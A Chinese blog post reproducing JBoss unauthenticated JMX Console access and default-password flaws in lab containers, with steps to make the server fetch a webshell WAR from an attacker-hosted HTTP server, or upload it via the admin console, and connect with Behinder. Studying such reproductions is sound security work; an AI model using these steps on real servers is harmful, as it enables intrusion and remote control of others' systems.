JBoss 未授权访问和弱口令复现

已于 2023-02-21 01:18:54 修改
阅读量1.2k 收藏 6
点赞数 2
分类专栏: 漏洞复现 文章标签: web安全
于 2023-02-21 01:16:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53747497/article/details/129134585
版权

文章目录

JBoss 未授权访问和弱口令复现

JBoss简介

一个基于J2EE的开放源代码的应用服务器 。JBoss 是一个管理 EJB 的容器和服务器,但 JBoss 核心服务不包括支持 servlet/JSP 的WEB容器,一般 与Tomcat或Jetty绑定使用。Jboss是Java EE 应用服务器(就像Apache是web服务器一样),专门用来 运行Java EE程序的。

JMX Console 未授权访问漏洞

环境搭建
docker search testjboss 
docker pull testjboss/jboss 
docker run -p 8080:8080 -d testjboss/jboss

JBoss框架的常见页面如下。

请添加图片描述

复现过程

1.访问它的后台页面 ,可以直接进入它的后台, 如果要登录账号和密码都是admin。

 http://192.168.42.132:8080/jmx-console/

2.找到jboss.deployment,进入后找到 void addURL() ,有两个,选择java.lang .String 那个去填写恶意文件的网址。

请添加图片描述
请添加图片描述

3.攻击机上用python开启http服务,在路径上输入恶意文件的位置,然后点击invoke。会发现部署成功,就返回上一层点击apply 。

//开启http服务
python3 -m http.server

//打包war 包
jar -cvf yijian.war yijian.jsp

//文件所在位置
http://192.168.3.18:8000/yijian.war

请添加图片描述
请添加图片描述

4.会然后攻击机上开启服务就会接收到请求,成功则显示200.也可以再返回上一层,找到jboss.web.deployment 查看是否部署成功。

请添加图片描述
请添加图片描述

5.成功后就访问地址,用webshell管理工具,但后面发现蚁剑的shell不行,得用冰蝎去连接。(步骤和前面一样) 发现部署失败或者连接不到上传的shell,就重启靶场,按步骤用冰蝎的shell.jsp上线即可。

http://192.168.42.132:8000/shell/shell.jsp

请添加图片描述

Jboss弱口令Getshell

漏洞简介

JBoss Administration Console存在默认账号密码admin/admin,但如果在vulhub上搭建的靶场,那密码就是vulhub 。如果Administration Console可以登录,就可以在后台部署war包。

环境搭建

在vulhub上找到jboss,然后开启它就可以了。

请添加图片描述

复现过程

1.访问地址,点击administration console ,在弹窗上输入账号和密码 admin /vulhub 。

请添加图片描述

在这里插入图片描述

2.点击war那,进行 add 。选择上面未授权靶场利用到的冰蝎shell.jsp打包生成的shell.war 进行上传。
在这里插入图片描述

在这里插入图片描述

3.成功部署后,点击content,继续选择shell.war 恶意文件进行上传。

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

4.访问上传的木马文件,用冰蝎进行连接。

http://ip:8080/shell/shell.jsp

请添加图片描述

本文仅限于进行安全测试,请勿使用来作攻击他人电脑,造成损失和违法犯罪行为与作者本人无关。

00zzz
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JBoss3.0下配置和部署EJB简介
02-04
1.JBoss简介JBoss是一个运行EJB的J2EE应用服务器。它是开放源代码的项目,遵循最新的J2EE规范。从JBoss项目开始至今,它已经从一个EJB容器发展成为一个基于的J2EE的一个web操作系统(operatingsystemforweb),它体现了J2EE规范中最新的技术,并且它还在theJavaWorldEditors'Choice2002评选中获得“最佳Java应用服务器”大奖。无论是学习还是应用,JBoss为我们提供了一个非常优秀的平台。有关JBoss的详细信息请参阅其主页http://www.jboss.org。刚开始使用JBoss进行EJB开发时,由于可供参考的资源不是
JBOSS 授权访问漏洞复现学习
0nc3的博客
12-18 1394
0x00 漏洞简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。 默认情况下访问 http://ip:8080/jmx-console 就可以访问管理控制台,不需要输入用户名和密码就可以直接浏览 JBoss 的部署管理的信息,部署上传木马,存在...
JBOSS授权访问
qq_41788704的博客
10-09 2113
JBOSS主页 # URL后添加 jmx-console/进入控制台,然后进入deployment # jar cvf back.war shell.jsp 将木马打成war包,然后放在公网服务器上,在箭头指向的地方填入war包地址
JBoss安全之jmx-console控制台授权访问漏洞
Keep learing, and stay fast
11-02 4127
近期工作用到了jmx-console,顺便整理下Jboss的Jmx-console密码访问相关的知识与配置。 MBean就是一种规范的JavaBean,通过集成和实现一套标准的Bean接口,这种叫MBean,Mbean注册到MBeanServer中。之后将被MBeanServer中注册过的Adapter(比如渲染为HTML的HtmlAdapter)渲染为直观的页面将MBean的属性和方法展示给用户。 MBean -> MBeanServer ...
Jboss 授权访问漏洞getshell漏洞复现
W小哥
11-24 1816
一、漏洞描述 授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件。 二、环境搭建 利用vulhub的CVE-2017-7504环境 三、漏洞复现
JBOSS授权漏洞详细复现
柠鹿的轨迹
11-06 5782
0x00 前言 习常规而明其理,探非凡且有所见。 --涂寐 0x01 JBOSS授权访问简介 JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。 JBOSS授权访问漏洞表现为,在默认情况下无需账密就可以直接访问 http://127.0.0.1:8080/jmx-console 进入管理控制台,进而导致网站信息泄露、服务器被上传...
jboss--JMX Console授权访问
hovcfuti的博客
10-13 432
然后找到jboss.deployment(jboss 自带的部署功能)中的flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到jmx控制台,并在其中执⾏任何功能。若需登录,可以尝试爆破弱口令登录。返回JMX Console里面,刷新找到jboss.web.deployment,如果出现上传的war,则部署成功。
Jboss弱口令Getshell
HAKUNAMATATATTA的博客
12-09 1201
JBoss Administration Console存在默认账号密码admin/vulhub,如果Administration Console可以登录,就可以在后台部署war包getshell。
JBoss漏洞:Jboss授权访问漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-09 934
Jboss授权访问漏洞合集:JBOSS授权访问漏洞表现为,在默认情况下无需账密就可以直接访问http://127.0.0.1:8080/jmx-console进入管理控制台,进而导致网站信息泄露、服务器被上传shell(如反弹shell,wget写webshell文件),最终网站被攻陷。 该漏洞影响所有低版本的JBOSS,对其下用户影响深远. JBoss 4 使用vulnhub提供的环境
Jboss授权访问getshell(JMX-Console)
weixin_51151498的博客
12-10 1039
Jboss授权访问getshell(JMX-Console)
JBossESB学习笔记.rar_Jboss_ESB_esb和aop
09-23
Jboss_ESB学习笔记以及总结和实例
使用JBoss jBPM实现流程访问和执行的授权
05-19
使用JBoss jBPM实现流程访问和执行的授权
heise5yuetian#yougar0.github.io#JBoss Administration Console 弱口令
07-25
1、点击Administration console 3、点击Web application ,然后点击右上角的add 4、把文件传上去即可getshell
linux操作Oracle数据库和jboss服务器
12-14
 2、查看是否有jboss启动: ps -ef|grep jboss  3、有启动的进程,没有则不需要该操作: kill -9 查到的进程号(杀死进程)  4、杀死进程后才可以关闭监听,切换到Oracle用户: su – oracle  5、关闭监听:...
jboss-eap-6.3.0软件和源码.zip
08-02
jboss-eap-6.3.0软件和源码.zip
使用Eclipse开发J2EE应用—集成Eclipse,Lomboz和JBoss
02-04
Lomboz是一个免费的Eclipseplugin,它将很多Java应用服务器、J2EE组件和Web应用开发集成到Eclipse中,可以帮助Java开发者使用Eclipse建立、测试、部署J2EE应用。JBoss是一个开放源码、功能强大的Java应用服务器,也...
JBoss7和容器轻量化研究报告
06-20
JBoss7.x, WildFly进行技术研究
不同版本jboss访问EJB的方式
03-08
自己经过实践总结出来的jbossjboss7访问EJB的方法,经过试验证明方法无误,这么好的资源还不赶快下载!
springboot和JBOSS
最新发布
03-07
Spring Boot是一个用于创建独立的、基于Spring框架的Java应用程序的开发框架。它简化了Spring应用程序的配置和部署过程,提供了一种快速开发和轻量级的方式来构建Java应用程序。Spring Boot提供了自动配置和约定优于配置的原则,使得开发者可以更加专注于业务逻辑的实现,而不需要过多关注底层的配置细节。 JBOSS(全称为JBoss Application Server)是一个开源的Java应用服务器,它提供了一个运行Java应用程序的平台。JBOSS是基于Java EE(Java Enterprise Edition)规范的实现,支持企业级应用程序的开发和部署。它提供了丰富的功能和组件,包括事务管理、安全性、远程调用等,可以满足企业级应用程序的需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值